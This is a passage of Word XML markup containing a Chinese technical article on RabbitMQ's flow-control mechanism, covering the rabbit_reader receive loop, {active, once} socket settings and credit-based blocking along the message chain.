        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>长连接进行通讯，接收数据的起点进程为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rabbit_reader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。首先分析它的接收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="108AC6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="236" name="图片 3" descr="收藏代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId22" tooltip="&quot;收藏这段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收藏代码">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;收藏这段代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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recvloop(Deb, State = #v1{connection_state = blocked}) -&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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    mainloop(Deb, State);   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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lastRenderedPageBreak/>
        <w:t>recvloop(Deb, State = #v1{sock = Sock, recv_len = RecvLen, buf_len = BufLen})  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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  when BufLen &lt; RecvLen -&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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 &lt;span style=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"color: #ff0000;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt; &lt;strong&gt;  ok = rabbit_net:setopts(Sock, [{active, once}]), &lt;/strong&gt;&lt;/span&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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    mainloop(Deb, State#v1{pending_recv = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>});  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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recvloop(Deb, State = #v1{recv_len = RecvLen, buf = Buf, buf_len = BufLen}) -&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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    {Data, Rest} = split_binary(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> Buf of  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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                                    [B] -&gt; B;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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                                    _   -&gt; list_to_binary(lists:reverse(Buf))  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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                                end, RecvLen),  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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    recvloop(Deb, handle_input(State#v1.callback, Data,  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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                               State#v1{buf = [Rest],  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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                                        buf_len = BufLen - RecvLen})).  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从上面代码可以看出，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rabbit_reader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每接收到一个包，就设置套接字属性为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{active, onece}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，若当前连接被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>blocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时则不设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{active,once}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，这个接收进程就阻塞在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>receive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法上。通过这种方式来实现闸门的开关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、何时关闭闸门</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>erlang/OTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开发的</w:t>
      </w:r>
      <w:r w:rsidRPr="0024331F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，一个消息从被接收到被发送给订阅者，必然要在多个进程间的转发，从接收到被消费，一个消息所走过的所有进程自然形成一条消息链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过监</w:t>
      </w:r>
      <w:r w:rsidRPr="0024331F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>控这条链上每个节点</w:t>
      </w:r>
      <w:r w:rsidRPr="0024331F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“mailbox”</w:t>
      </w:r>
      <w:r w:rsidRPr="0024331F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中未被接收的消息数量，决定何时关闭闸门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。实现机制如下所述：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5057775" cy="2466975"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="237" name="图片 4" descr="http://dl.iteye.com/upload/attachment/0069/6385/da71e04a-64b3-3a54-b82a-9b75135acc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dl.iteye.com/upload/attachment/0069/6385/da71e04a-64b3-3a54-b82a-9b75135acc47.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId314" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5057775" cy="2466975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00637137" w:rsidRDefault="00313CF7" w:rsidP="00637137">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如图所示，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1942">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1942">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1942">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1942">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1942">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1942">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1942">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>连成一条消息链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42673">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进程字典</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中有一对关于收发消息的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>credit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
